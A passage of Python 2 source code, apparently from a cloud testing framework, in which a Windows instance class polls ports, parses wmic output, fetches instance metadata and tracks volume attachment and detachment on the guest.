ip=None, interval=10, socktimeout=5, timeout=180):\n ip = ip or self.ip_address\n ports = ports or [self.rdp_port, self.winrm_port]\n start = time.time()\n elapsed = 0\n attempt = 0\n while elapsed < timeout:\n attempt +=1\n self.debug('test_poll_for_ports_status, ports: ' + \",\".join(str(x) for x in ports) + \", attempt:\" + str(attempt))\n for port in ports:\n if elapsed < timeout:\n try:\n self.debug('Trying ip:port:' + str(self.ip_address) + ':' + str(port) + \", elapsed:\" + str(elapsed))\n self.test_port_status(ip=ip, port=int(port), timeout=5)\n return\n except socket.error, se:\n self.debug('test_ports_status failed socket error:'+str(se[0]))\n #handle specific errors here, for now just for debug...\n ecode=se[0]\n if ecode == socket.errno.ETIMEDOUT or ecode == \"timed out\":\n self.debug(\"test_poll_for_ports_status: Connect \"+str(ip)+\":\" +str(port)+ \" timed out retrying. Time remaining(\"+str(timeout-elapsed)+\")\")\n except Exception, e:\n tb = self.tester.get_traceback()\n self.debug(tb)\n self.debug('test_poll_for_ports_status:'+str(ip)+':'+str(port)+' FAILED after attempts:'+str(attempt)+', elapsed:'+str(elapsed)+', err:'+str(e) )\n elapsed = int(time.time() -start)\n if elapsed < timeout:\n time.sleep(interval)\n\n raise Exception('test_poll_for_ports_status:'+str(ip)+':'+str(port)+' FAILED after attempts:'+str(attempt)+', elapsed:'+str(elapsed)+' seconds')\n\n def init_attached_volumes(self):\n self.debug('init_attahced_volumes... attached_vols: ' + str(self.attached_vols))\n syncdict = self.sync_attached_volumes_with_clouds_view()\n if syncdict['errors']:\n errmsg = 'Errors syncing guest volumes with cloud at init:' + \",\".join(str(e) for e in syncdict['errors'])\n errmsg += 'Failed to sync guest volumes with cloud at init:' + \",\".join(str(x) for x in syncdict['badvols'])\n self.debug(errmsg)\n time.sleep(60)\n raise Exception(errmsg)\n\n def sync_attached_volumes_with_clouds_view(self):\n self.debug(termline +\n \"Starting sync_attached_volumes_with_clouds_view\"\n + termline )\n badvols = []\n errors = []\n ret = {'errors':errors, 'badvols':badvols}\n #Get a list of volumes that the cloud believes are currently attached\n cloud_volumes = self.tester.get_volumes(attached_instance=self.id)\n #Make a copy of a list of volumes this instance thinks are currenlty attached\n locallist = copy.copy(self.attached_vols)\n self.debug('Cloud list:' + str(cloud_volumes))\n self.debug('Local list:' + str(locallist))\n\n for vol in cloud_volumes:\n for local_vol in locallist:\n if local_vol.id == vol.id:\n locallist.remove(local_vol)\n if not isinstance(vol, EuVolume):\n vol = EuVolume.make_euvol_from_vol(vol, self.tester)\n try:\n self.update_volume_guest_info(volume=vol)\n except Exception, e:\n badvols.append(vol)\n errors.append(vol.id + ' Error syncing with cloud:' + str (e) + '. \\n')\n for local_vol in locallist:\n badvols.append(local_vol)\n errors.append(local_vol.id + ' Error unattached volume found in guests attach list. \\n')\n self.debug(termline +\n \"Finishing sync_attached_volumes_with_clouds_view\"\n + termline )\n return ret\n\n\n\n def update_system_info(self):\n '''\n Gather basic system info for this windows instance object and store in self.system_info\n Example:\n # print wins.system_info.OS_NAME\n 'Microsoft Windows 7 Professional'\n '''\n currentkey = None\n swap = re.compile('([!@#$%^&*. ])')\n info = self.sys('systeminfo')\n if self.system_info:\n system_info = self.system_info\n else:\n system_info = type('obj', (object,),{})\n if info:\n for line in info:\n if re.match(\"^\\w.+:\", line):\n linevals = line.split(':')\n currentkey = linevals.pop(0)\n #clean up the key string...\n currentkey = re.sub('[()]', '', currentkey)\n currentkey = re.sub(swap, '_', currentkey)\n currentkey = currentkey.lower()\n value = \":\".join(str(x) for x in linevals) or \"\"\n setattr(system_info, currentkey, str(value).strip())\n elif currentkey:\n #this is an additional value to our previous key\n prev_value = getattr(system_info, currentkey)\n if not isinstance(prev_value, types.ListType):\n updated_value = [prev_value]\n updated_value.append(str(line).strip())\n setattr(system_info, currentkey, updated_value)\n self.system_info = system_info\n\n def get_cygwin_path(self, prefix=\"c:\\\\\"):\n if self.cygwin_path:\n return self.cygwin_path\n path = None\n self.debug('Trying to find cygwin path...')\n out = self.sys('dir ' + str(prefix) + ' /B')\n for line in out:\n if re.search('cygwin', line):\n path = str(prefix) + str(line.strip()) + \"\\\\\"\n self.cygwin_path = path\n break\n return path\n\n def cygwin_curl(self, url, connect_timeout=30):\n cygpath = self.get_cygwin_path()\n if cygpath is None:\n raise Exception('Could not find cygwin path on guest for curl?')\n curl = cygpath + 'bin\\curl.exe --connect-timeout ' + str(connect_timeout) + ' '\n return self.sys(curl + str(url), code=0, timeout=connect_timeout)\n\n\n\n def get_metadata(self, element_path='', prefix='latest/meta-data/', use_cygwin=True):\n \"\"\"Return the lines of metadata from the element path provided\"\"\"\n ### If i can reach the metadata service ip use it to get metadata otherwise try the clc directly\n try:\n if use_cygwin:\n return self.cygwin_curl(\"http://169.254.169.254/\"+str(prefix)+str(element_path), connect_timeout=10)\n else:\n return self.sys(\"curl --connect-timeout 10 http://169.254.169.254/\"+str(prefix)+str(element_path), code=0)\n except:\n if use_cygwin:\n return self.cygwin_curl(\"http://\" + self.tester.get_ec2_ip() + \":8773/\"+str(prefix) + str(element_path))\n else:\n return self.sys(\"curl http://\" + self.tester.get_ec2_ip() + \":8773/\"+str(prefix) + str(element_path), code=0)\n\n\n def print_diskdrive_summary(self,printmethod=None):\n printmethod = printmethod or self.debug\n if not self.diskdrives:\n printmethod('No disk drives to print?')\n return\n disklist = copy.copy(self.diskdrives)\n buf = (disklist.pop()).get_summary()\n for disk in disklist:\n buf += disk.get_summary(printheader=False)\n printmethod(buf)\n\n def print_partition_summary(self,printmethod=None):\n printmethod = printmethod or self.debug\n if not self.disk_partitions:\n printmethod('No disk partitions to print?')\n return\n partlist = copy.copy(self.disk_partitions)\n buf = (partlist.pop()).get_summary()\n for part in partlist:\n buf += part.get_summary(printheader=False)\n printmethod(buf)\n\n def print_logicaldisk_summary(self,printmethod=None):\n printmethod = printmethod or self.debug\n if not self.logicaldisks:\n printmethod('No disk disk_partitions to print?')\n return\n disklist = copy.copy(self.logicaldisks)\n buf = (disklist.pop()).get_summary()\n for disk in disklist:\n buf += disk.get_summary(printheader=False)\n printmethod(buf)\n\n\n def update_disk_info(self , forceupdate=False):\n if self.diskdrives:\n if not forceupdate and (time.time() - self.diskdrives[0].last_updated) <= self.disk_update_interval:\n return\n self.debug('Fetching updated disk info...')\n self.diskdrives = []\n self.disk_partitions = []\n self.logicaldisks = []\n self.diskdrives = self.get_updated_diskdrive_info()\n self.disk_partitions = self.get_updated_partition_info()\n self.logicaldisks = self.get_updated_logicaldisk_info()\n self.associate_diskdrives_to_partitions()\n self.associate_partitions_to_logicaldrives()\n\n def get_updated_diskdrive_info(self):\n '''\n Populate self.diskdrives with WinInstanceDisk objects containing info parsed from wmic command.\n Since wmic doesn't seem to use delimeters this method attempts to derive the lengh of each column/header\n in order to parse out the info per disk.\n :pararm force: boolean. Will force an update, otherwise this method will wait a minimum of\n self.disk_update_interval before updating again.\n '''\n #cmd = \"wmic diskdrive get /format:textvaluelist.xsl\"\n self.debug('Getting updated diskdrive info...')\n cmd = \"wmic diskdrive list full\"\n\n diskdrives = []\n for disk_dict in self.get_parsed_wmic_command_output(cmd):\n try:\n diskdrives.append(WinInstanceDiskDrive(self,disk_dict))\n except Exception, e:\n tb = self.tester.get_traceback()\n self.debug('Error attempting to create WinInstanceDiskDrive from following dict:')\n self.print_dict(dict=disk_dict)\n raise Exception(str(tb) + \"\\n Error attempting to create WinInstanceDiskDrive:\" + str(e))\n self.debug('get_updated_diskdrive_info, Done')\n return diskdrives\n\n\n def get_updated_partition_info(self):\n '''\n Populate self.diskdrives with WinInstanceDisk objects containing info parsed from wmic command.\n Since wmic doesn't seem to use delimeters this method attempts to derive the lengh of each column/header\n in order to parse out the info per disk.\n :pararm force: boolean. Will force an update, otherwise this method will wait a minimum of\n self.disk_update_interval before updating again.\n '''\n self.debug('Getting udpated partition info...')\n cmd = \"wmic partition list brief /format:textvaluelist.xsl\"\n\n disk_partitions = []\n for part_dict in self.get_parsed_wmic_command_output(cmd):\n try:\n disk_partitions.append(WinInstanceDiskPartition(self,part_dict))\n except Exception, e:\n tb = self.tester.get_traceback()\n self.debug('Error attempting to create WinInstanceDiskPartition from following dict:')\n self.print_dict(dict=part_dict)\n raise Exception(str(tb) + \"\\n Error attempting to create WinInstanceDiskPartition:\" + str(e))\n self.debug('get_updated_partition_info, Done')\n return disk_partitions\n\n\n def get_updated_logicaldisk_info(self):\n self.debug('Getting updated logicaldisk info...')\n cmd ='wmic logicaldisk list /format:textvaluelist.xsl'\n logicaldisks = []\n for part_dict in self.get_parsed_wmic_command_output(cmd):\n try:\n logicaldisks.append(WinInstanceLogicalDisk(self,part_dict))\n except Exception, e:\n tb = self.tester.get_traceback()\n self.debug('Error attempting to create WinInstanceLogicalDisk from following dict:')\n self.print_dict(dict=part_dict)\n raise Exception(str(tb) + \"\\n Error attempting to create WinInstanceLogicalDisk:\" + str(e))\n self.debug('get_updated_logicaldisk_info, Done')\n return logicaldisks\n\n\n def associate_diskdrives_to_partitions(self):\n for disk in self.diskdrives:\n disk.disk_partitions = []\n for part in self.disk_partitions:\n if part.diskindex == disk.index:\n disk.disk_partitions.append(part)\n\n def associate_partitions_to_logicaldrives(self, verbose=False):\n for part in self.disk_partitions:\n drive_id = None\n part.logicaldisks = []\n cmd = 'wmic partition where (DeviceID=\"Disk #' + str(part.diskindex) + \\\n ', Partition #' + str(part.index) + '\") assoc /assocclass:Win32_LogicalDiskToPartition'\n output = self.sys(cmd, verbose=verbose, code=0)\n for line in output:\n if re.search('Win32_LogicalDisk.DeviceID',line):\n try:\n drive_id = str(line.split()[0].split('=')[1]).replace('\"','').strip()\n except Exception, e:\n tb = self.tester.get_traceback()\n self.debug(str(tb)+ \"\\nError getting logical drive info:\" + str(e))\n if drive_id:\n for disk in self.logicaldisks:\n if re.match(disk.deviceid, drive_id):\n part.logicaldisks.append(disk)\n disk.partition = part\n break\n\n def get_cygwin_scsi_dev_for_windows_drive(self, windisk=None, drive_id=\"\"):\n '''\n param windisk: WinInstanceDiskType object. windisk.deviceid is used to look up the associated cygwin device\n param drive_id: String representing the deviceid. Can be used instead of passing a WinInstanceDiskType\n '''\n windisk_classname = \"\"\n update = False\n retries = 2\n if windisk:\n drive_id = windisk.deviceid\n windisk_classname = str(windisk.__class__).split('.').pop()\n #If this is a disk drive allow a retry which set the force update flag, otherwise don't force and retry\n if isinstance(windisk,WinInstanceDiskDrive):\n update = True\n if not drive_id:\n raise Exception('WinInstanceDiskType or string w/ device id not provided')\n\n self.debug('Attempting to get cygwin dev for windows drive:' + str(drive_id))\n self.update_cygwin_windows_device_map()\n for retry in xrange(0, retries):\n for device in self.cygwin_dev_map:\n if re.search(\"dev\", device):\n win_dev = str(self.cygwin_dev_map[device].split('\\\\').pop()).strip().upper()\n formated_drive_id = str(drive_id.split('\\\\').pop()).strip().upper()\n #self.debug('Attempt to match:\"' + str(win_dev) + '\" with \"' + str(formated_drive_id) + '\"')\n if formated_drive_id == win_dev:\n #self.debug('Found match')\n return device\n if update:\n self.update_cygwin_windows_device_map(force_update=True)\n else:\n break\n self.debug('WARNING: Could not find cygwin device for type:\"' + str(windisk_classname) + '\", deviceid:' + str(drive_id))\n return \"\"\n\n def get_parsed_wmic_command_output(self, wmic_command, verbose=False):\n '''\n Attempts to parse a wmic command using \"/format:textvaluelist.xsl\" for key value format into a list of\n dicts.\n :param wmic_command: string representing the remote wmic command to be run\n :returns : list of dict(s) created from the parsed key value output of the command.\n Note keys will be in lowercase\n\n '''\n self.debug('get_parsed_wmic_command_output, command:' + str(wmic_command))\n ret_dicts = []\n output = self.sys(wmic_command, verbose=verbose, code=0)\n newdict = {}\n for line in output:\n if not re.match(r\"^\\w\",line):\n #If there is a blank line(s) then the previous object is complete\n if newdict:\n ret_dicts.append(newdict)\n newdict = {}\n else:\n splitline = line.split('=')\n key = str(splitline.pop(0)).lower()\n if len(splitline) > 1:\n value = \"=\".join(str(x) for x in splitline)\n else:\n if splitline:\n value = splitline.pop()\n else:\n value = ''\n newdict[key] = value\n return ret_dicts\n\n def get_logicaldisk_ids(self, forceupdate=False):\n '''\n :param forceupdate: boolean, to force an update of logical disks detected on the guest. Otherwise updates are\n throttled to self.disk_update_interval\n :returns list of device ids (ie: [A:,C:,D:]\n '''\n ret = []\n self.update_disk_info(forceupdate=forceupdate)\n for disk in self.logicaldisks:\n ret.append(disk.deviceid)\n return ret\n\n def get_diskdrive_ids(self, drivelist=None, forceupdate=False):\n '''\n :param forceupdate: boolean, to force an update of logical disks detected on the guest. Otherwise updates are\n throttled to self.disk_update_interval\n :returns list of device ids ie: ['\\\\.\\PHYSICALDRIVE0','\\\\.\\PHYSICALDRIVE1,'\\\\.\\PHYSICALDRIVE2']\n '''\n ret = []\n if not drivelist:\n self.update_disk_info(forceupdate=forceupdate)\n drivelist = self.diskdrives\n for disk in drivelist:\n ret.append(disk.deviceid)\n return ret\n\n def get_diskdrive_by_deviceid(self, deviceid):\n for disk in self.diskdrives:\n if disk.deviceid == deviceid:\n return disk\n\n\n def found(self, command, regex):\n \"\"\" Returns a Boolean of whether the result of the command contains the regex\"\"\"\n result = self.sys(command)\n for line in result:\n found = re.search(regex,line)\n if found:\n return True\n return False\n\n def assertFilePresent(self,filepath):\n '''\n Raise exception if file not found at filepath on remote guest. dirs '\\' need to be represented as '\\\\'\n '''\n self.sys('dir ' + str(filepath), code=0)\n\n def assertCygwinFilePresent(self, filepath):\n self.cygwin_cmd('ls ' + str(filepath), code=0)\n\n\n def attach_volume(self, volume, dev=None, timeout=180, overwrite=False):\n '''\n Method used to attach a volume to an instance and track it's use by that instance\n required - euvolume - the euvolume object being attached\n required - tester - the eucaops/nephoria object/connection for this cloud\n optional - dev - string to specify the dev path to 'request' when attaching the volume to\n optional - timeout - integer- time allowed before failing\n optional - overwrite - flag to indicate whether to overwrite head data of a non-zero filled volume upon attach for md5\n '''\n if not isinstance(volume, EuVolume):\n volume = EuVolume.make_euvol_from_vol(volume)\n return self.attach_euvolume(volume, dev=dev, timeout=timeout, overwrite=overwrite)\n\n\n def attach_euvolume(self, euvolume, dev=None, timeout=180, overwrite=False):\n '''\n Method used to attach a volume to an instance and track it's use by that instance\n required - euvolume - the euvolume object being attached\n required - tester - the eucaops/nephoria object/connection for this cloud\n optional - dev - string to specify the dev path to 'request' when attaching the volume to\n optional - timeout - integer- time allowed before failing\n optional - overwrite - flag to indicate whether to overwrite head data of a non-zero filled volume upon attach for md5\n '''\n if not isinstance(euvolume, EuVolume):\n raise Exception(\"Volume needs to be of type euvolume, try attach_volume() instead?\")\n\n self.debug('Disk drive summary before attach attempt:')\n self.print_logicaldisk_summary()\n self.print_diskdrive_summary()\n self.debug(\"Attempting to attach volume:\"+str(euvolume.id)+\" to instance:\" +str(self.id)+\" to dev:\"+ str(dev))\n #grab a snapshot of our devices before attach for comparison purposes\n diskdrive_list_before = self.get_diskdrive_ids()\n use_serial = False\n for disk in self.diskdrives:\n if re.search('vol-', disk.serialnumber):\n use_serial = True\n break\n attached_dev = None\n start= time.time()\n elapsed = 0\n if dev is None:\n #update our block device prefix\n dev = self.get_free_scsi_dev()\n if (self.tester.attach_volume(self, euvolume, dev, pause=10,timeout=timeout)):\n if euvolume.attach_data.device != dev:\n raise Exception('Attached device:' + str(euvolume.attach_data.device) +\n \", does not equal requested dev:\" + str(dev))\n #Find device this volume is using on guest...\n euvolume.guestdev = None\n while (not euvolume.guestdev and elapsed < timeout):\n #Since all hypervisors may not support serial number info, check for an incremental diff in the\n # list of physical diskdrives on this guest.\n self.debug(\"Checking for volume attachment on guest, elapsed time(\"+str(elapsed)+\")\")\n diskdrive_list_after = self.get_diskdrive_ids(forceupdate=True)\n self.print_logicaldisk_summary()\n self.print_diskdrive_summary()\n self.debug(\"dev_list_after:\"+\" \".join(diskdrive_list_after))\n diff =list( set(diskdrive_list_after) - set(diskdrive_list_before) )\n if len(diff) > 0:\n self.debug('Got Diff in drives:' + str(diff))\n for disk in self.diskdrives:\n if re.search('vol-', disk.serialnumber):\n use_serial = True\n if euvolume.id == disk.ebs_volume:\n attached_dev = disk.deviceid\n euvolume.guestdev = attached_dev\n self.debug(\"Volume:\"+str(euvolume.id)+\" guest device by serialnumber:\"+str(euvolume.guestdev))\n break\n if not use_serial:\n attached_dev = str(diff[0])\n euvolume.guestdev = attached_dev.strip()\n self.debug(\"Volume:\"+str(euvolume.id)+\"found guest device by diff:\"+str(euvolume.guestdev))\n if attached_dev:\n euvolume.guestdev = attached_dev\n attached_vol = self.get_volume_from_attached_list_by_id(euvolume.id)\n self.attached_vols.append(euvolume)\n self.debug(euvolume.id+\": Requested dev:\"+str(euvolume.attach_data.device)+\", attached to guest device:\"+str(euvolume.guestdev))\n break\n elapsed = int(time.time() - start)\n time.sleep(2)\n if not euvolume.guestdev or not attached_dev:\n raise Exception('Device not found on guest after '+str(elapsed)+' seconds')\n else:\n self.debug('Failed to attach volume:'+str(euvolume.id)+' to instance:'+self.id)\n raise Exception('Failed to attach volume:'+str(euvolume.id)+' to instance:'+self.id)\n if (attached_dev is None):\n self.debug(\"List after\\n\"+\" \".join(diskdrive_list_after))\n raise Exception('Volume:'+str(euvolume.id)+' attached, but not found on guest'+str(self.id)+' after '+str(elapsed)+' seconds?')\n #Store the md5sum of this diskdrive in the euvolume...\n disk = self.get_diskdrive_by_deviceid(attached_dev)\n euvolume.md5len = 1024\n euvolume.md5 = self.get_dev_md5(devpath=disk.cygwin_scsi_drive, length=euvolume.md5len)\n #update the volume and instances information about the attachment...\n self.update_volume_guest_info(volume=euvolume,md5=euvolume.md5, md5len=euvolume.md5len, guestdev=euvolume.guestdev)\n self.debug('Success attaching volume:'+str(euvolume.id)+' to instance:'+self.id +\n ', cloud dev:'+str(euvolume.attach_data.device)+', attached dev:'+str(attached_dev) +\n \", elapsed:\" + str(elapsed))\n try:\n self.rescan_disks(timeout=20)\n except Exception, e:\n self.debug('Warning. Error while trying to rescan disks after attaching volume. Error: ' + str(e))\n euvolume.printself(printmethod=self.debug)\n disk.print_self()\n return attached_dev\n\n\n def get_guest_dev_for_volume(self, volume, forceupdate=False):\n use_serial = False\n self.update_disk_info(forceupdate=forceupdate)\n for disk in self.diskdrives:\n if re.search('vol-', disk.serialnumber):\n use_serial = True\n break\n\n if not isinstance(volume, EuVolume):\n volume = EuVolume.make_euvol_from_vol(volume=volume, tester=self.tester)\n\n\n def get_disk_drive_by_id(self, deviceid):\n self.update_system_info()\n for disk in self.diskdrives:\n if disk.deviceid == deviceid:\n return disk\n return None\n\n\n def get_guestdevs_inuse_by_vols(self):\n retlist = []\n for vol in self.attached_vols:\n retlist.append(vol.guestdev)\n return retlist\n\n\n def get_free_scsi_dev(self, prefix=None,maxdevs=16):\n '''\n The volume attach command requires a cloud level device name that is not currently associated with a volume\n Note: This is the device name from the clouds perspective, not necessarily the guest's\n This method attempts to find a free device name to use in the command\n optional - prefix - string, pre-pended to the the device search string\n optional - maxdevs - number use to specify the max device names to iterate over.Some virt envs have a limit of 16 devs.\n '''\n d='e'\n in_use_cloud = \"\"\n in_use_guest = \"\"\n dev = None\n if prefix is None:\n prefix = self.block_device_prefix\n cloudlist=self.tester.get_volumes(attached_instance=self.id)\n\n for x in xrange(0,maxdevs):\n inuse=False\n #double up the letter identifier to avoid exceeding z\n if d == 'z':\n prefix= prefix+'e'\n dev = \"/dev/\"+prefix+str(d)\n for avol in self.attached_vols:\n if avol.attach_data.device == dev:\n inuse = True\n in_use_guest += str(avol.id)+\", \"\n continue\n #Check to see if the cloud has a conflict with this device name...\n for vol in cloudlist:\n vol.update()\n if (vol.attach_data is not None) and (vol.attach_data.device == dev):\n inuse = True\n in_use_cloud += str(vol.id)+\", \"\n continue\n if inuse is False:\n self.debug(\"Instance:\"+str(self.id)+\" returning available cloud scsi dev:\"+str(dev))\n return str(dev)\n else:\n d = chr(ord('e') + x) #increment the letter we append to the device string prefix\n dev = None\n if dev is None:\n raise Exception(\"Could not find a free scsi dev on instance:\"+self.id+\", maxdevs:\"+str(maxdevs)+\"\\nCloud_devs:\"+str(in_use_cloud)+\"\\nGuest_devs:\"+str(in_use_guest))\n\n\n def detach_euvolume(self, euvolume, waitfordev=True, timeout=180):\n '''\n Method used to detach detach a volume to an instance and track it's use by that instance\n required - euvolume - the euvolume object being deattached\n waitfordev - boolean to indicate whether or no to poll guest instance for local device to be removed\n optional - timeout - integer seconds to wait before timing out waiting for the volume to detach\n '''\n start = time.time()\n elapsed = 0\n found = True\n for vol in self.attached_vols:\n if vol.id == euvolume.id:\n dev = vol.guestdev\n if (self.tester.detach_volume(euvolume,timeout=timeout)):\n if waitfordev:\n self.debug(\"Cloud has detached\" + str(vol.id) + \", Wait for device:\"+str(dev)+\" to be removed on guest...\")\n while (elapsed < timeout):\n diskdrive_ids = []\n try:\n disk_drives = self.get_updated_diskdrive_info()\n for disk in disk_drives:\n if dev == disk.deviceid:\n found = True\n break\n found = False\n self.debug('Diskdrive associated with ' + str(vol.id) + ' has been removed from guest.')\n #if device is not present remove it\n self.attached_vols.remove(vol)\n\n except Exception, de:\n self.debug('Warning, error getting diskdrive id during detach:' + str(de))\n if not found:\n try:\n self.rescan_disks(timeout=20)\n except Exception, re:\n self.debug('Warning: Error while trying to rescan disks after detaching volume:' + str(re))\n try:\n self.update_disk_info()\n except Exception, ue:\n self.debug('Warning: Error while trying to update disk info:' + str(ue))\n try:\n self.print_diskdrive_summary()\n except: pass\n self.debug('Volume:' + str(vol.id) + ', detached, and no longer found on guest at:' + str(dev))\n vol.set_volume_detached_tags()\n return True\n time.sleep(10)\n elapsed = int(time.time()-start)\n diskdrive_ids = self.get_diskdrive_ids(drivelist=disk_drives)\n self.debug('Current disk drives on guest:' + \",\".join(str(x) for x in diskdrive_ids))\n self.debug(\"Waiting for device '\"+str(dev)+\"' on guest to be removed.Elapsed:\"+str(elapsed))\n\n else:\n self.attached_vols.remove(vol)\n vol.set_volume_detached_tags()\n return True\n else:\n raise Exception(\"Volume(\"+str(vol.id)+\") failed to detach from device(\"+str(dev)+\") on (\"+str(self.id)+\")\")\n\n raise Exception(\"Detach Volume(\"+str(euvolume.id)+\") not found on (\"+str(self.id)+\")\")\n return False\n\n def check_hostname(self):\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n if hasattr(self, 'system_info') and hasattr(self.system_info, 'host_name'):\n if self.id.upper() == self.system_info.host_name.upper():\n self.debug('Hostname:' + str(self.id) + \", instance.id:\" + str(self.system_info.host_name))\n else:\n raise Exception('check_hostname failed: hostname:' + str(self.system_info.host_name).upper() +\n \" != id:\" + str(self.id).upper())\n else:\n raise Exception('check_hostname failed: System_info.hostname not populated')\n\n def get_process_list_brief(self):\n '''\n Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a\n dict containing information about the service.\n '''\n cmd = \"wmic process list brief /format:textvaluelist.xsl\"\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_process_list_full(self):\n '''\n Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a\n dict containing information about the service.\n '''\n cmd = \"wmic process list full\"\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_process_by_name(self,process_name):\n '''\n Attempts to lookup a service on the remote guest.\n param service_name: string. The name of the service to get info\n returns a dict representing the information returned from the remote guest\n '''\n cmd = 'wmic process ' + str(process_name) + ' get /format:textvaluelist.xsl'\n result = self.get_parsed_wmic_command_output(cmd)\n if result:\n return result[0]\n\n def get_services_list_brief(self):\n '''\n Returns a list of dicts representing the services from the remote guest. Each service is represented by a\n dict containing information about the service.\n '''\n cmd = 'wmic service list brief /format:textvaluelist.xsl'\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_services_list_full(self):\n '''\n Returns a list of dicts representing the services from the remote guest. Each service is represented by a\n dict containing information about the service.\n '''\n cmd = 'wmic service list full'\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_service_by_name(self,service_name):\n '''\n Attempts to lookup a service on the remote guest.\n param service_name: string. The name of the service to get info\n returns a dict representing the information returned from the remote guest\n '''\n cmd = 'wmic service ' + str(service_name) + ' get /format:textvaluelist.xsl'\n result = self.get_parsed_wmic_command_output(cmd)\n if result:\n return result[0]\n\n def get_memtotal_in_mb(self):\n return long(self.system_info.total_physical_memory.split()[0].replace(',',''))\n\n def get_memtotal_in_gb(self):\n return long(self.get_memtotal_in_mb()/1024)\n\n def check_ram_against_vmtype(self, pad=32):\n total_ram = self.get_memtotal_in_mb()\n self.debug('Ram check: vm_ram:' + str(self.vmtype_info.ram)\n + \"mb vs memtotal:\" + str(total_ram)\n + \"mb. Diff:\" + str(self.vmtype_info.ram - total_ram)\n + \"mb, pad:\" + str(pad) + \"mb\")\n if not ((self.vmtype_info.ram - total_ram) <= pad):\n raise Exception('Ram check failed. vm_ram:' + str(self.vmtype_info.ram)\n + \" vs memtotal:\" + str(total_ram) + \". Diff is greater than allowed pad:\" + str(pad) + \"mb\")\n else:\n self.debug('check_ram_against_vmtype, passed')\n\n def check_ephemeral_against_vmtype(self):\n gb = self.gigabyte\n size = self.vmtype_info.disk\n ephemeral_dev = self.get_ephemeral_dev()\n block_size = self.get_blockdev_size_in_bytes(ephemeral_dev)\n gbs = block_size / gb\n self.debug('Ephemeral check: ephem_dev:'\n + str(ephemeral_dev)\n + \", bytes:\"\n + str(block_size)\n + \", gbs:\"\n + str(gbs)\n + \", vmtype size:\"\n + str(size))\n if gbs != size:\n raise Exception('Ephemeral check failed. ' + str(ephemeral_dev) + ' Blocksize: '\n + str(gbs) + \"gb (\" + str(block_size) + \"bytes)\"\n + ' != vmtype size:' +str(size) + \"gb\")\n else:\n self.debug('check_ephemeral_against_vmtype, passed')\n return ephemeral_dev\n\n def get_ephemeral_dev(self):\n \"\"\"\n Attempts to find the block device path on this instance\n\n :return: string representing path to ephemeral block device\n \"\"\"\n ephem_name = None\n dev_prefixs = ['s','v','xd','xvd']\n if not self.root_device_type == 'ebs':\n try:\n self.assertFilePresent('/dev/' + str(self.rootfs_device))\n return self.rootfs_device\n except:\n ephem_name = 'da'\n else:\n ephem_name = 'db'\n devs = self.get_dev_dir()\n for prefix in dev_prefixs:\n if str(prefix+ephem_name) in devs:\n return str('/dev/'+prefix+ephem_name)\n raise Exception('Could not find ephemeral device?')\n\n\n def cygwin_cmd(self, cmd, timeout=120, verbose=False, code=None):\n cmd = self.get_cygwin_path() + '\\\\bin\\\\bash.exe --login -c \"' + str(cmd) + '\"'\n return self.sys(cmd,timeout=timeout, verbose=verbose, code=code)\n\n def get_dev_md5(self, devpath, length, timeout=60):\n self.assertCygwinFilePresent(devpath)\n if length == 0:\n md5 = str(self.cygwin_cmd('md5sum ' + devpath, timeout=timeout)[0]).split(' ')[0].strip()\n else:\n md5 = str(self.cygwin_cmd(\"head -c \" + str(length) + \" \" + str(devpath) + \" | md5sum\")[0]).split(' ')[0].strip()\n return md5\n\n\n def update_cygwin_windows_device_map(self, prefix='/dev/*', force_update=False):\n cygwin_dev_map = {}\n if not force_update:\n if self.cygwin_dev_map:\n if time.time() - self.cygwin_dev_map['last_updated'] <= 30:\n cygwin_dev_map = self.cygwin_dev_map\n if not cygwin_dev_map:\n self.debug('Updating cygwin to windows device mapping...')\n output = self.cygwin_cmd(\"for DEV in \" + prefix + \" ; do printf $DEV=$(cygpath -w $DEV); echo ''; done\",\n verbose=False, code=0)\n for line in output:\n if re.match(prefix, line):\n split = line.split('=')\n key = split.pop(0)\n if split:\n value = split.pop()\n else:\n value = ''\n cygwin_dev_map[key]=value\n cygwin_dev_map['last_updated'] = time.time()\n self.cygwin_dev_map = cygwin_dev_map\n self.debug('Updated cygwin to windows device mapping')\n return cygwin_dev_map\n\n\n def rescan_disks(self, timeout=20):\n '''\n Attempts to rescan disks on the guest. This may help expedite updates/discovery when attaching/detaching\n volumes to the guest. This has also been found to hang post device removal so is used with a 20 second\n command timeout as the default.\n param timeout: integer. Seconds to wait on command before failing\n '''\n scriptname = 'eutester_diskpart_script'\n self.sys('(echo rescan && echo list disk ) > ' + str(scriptname), code=0)\n self.sys('diskpart /s ' + str(scriptname), code=0, timeout=timeout)\n\n\n def get_diskdrive_for_volume(self, volume):\n if not self.is_volume_attached_to_this_instance(volume):\n return None\n ret_disk = None\n for disk in self.diskdrives:\n disk.update_ebs_info()\n if disk.ebs_volume == volume.id:\n ret_disk = disk\n if not ret_disk:\n ret_disk = self.find_diskdrive_for_volume_by_serial_number(volume, force_check=True)\n if not ret_disk:\n if hasattr(volume,'md5') and volume.md5:\n ret_disk = self.find_diskdrive_for_volume_by_md5(volume, force_check=True)\n return ret_disk\n\n\n\n def find_diskdrive_for_volume_by_md5(self, volume, md5=None, length=None, force_check=False):\n if not force_check and not self.is_volume_attached_to_this_instance(volume):\n return None\n if not isinstance(volume, EuVolume):\n volume = EuVolume.make_euvol_from_vol(volume=volume,tester=self.tester)\n md5 = md5 or volume.md5\n if not md5:\n return None\n length = length or volume.md5len\n for disk in self.diskdrives:\n if disk.cygwin_scsi_drive:\n disk_md5 = self.get_dev_md5(disk.cygwin_scsi_drive, length=length)\n if disk_md5 == md5:\n volume.guestdev = disk.deviceid\n volume.md5 = disk_md5\n volume.md5len = length\n disk.ebs_volume = volume.id\n return disk\n return None\n\n\n\n def find_diskdrive_for_volume_by_serial_number(self, volume, serial_number=None, force_check=False):\n '''\n Attempt to iterate through all the diskdrives were aware of. If a diskdrive is found with a serial_number\n associated with the volume, return that diskdrive obj..\n example serial number format: vol-81C13EA4-dev-sdg\n\n :param volume: volume obj to use for deriving the serial_number\n :param serial_number: string. Optional. The string representing the serial # to match.\n :returns WinInstanceDiskDrive if found, else None\n '''\n if not force_check and not self.is_volume_attached_to_this_instance(volume):\n return None\n if not serial_number:\n serial_number = volume.id + 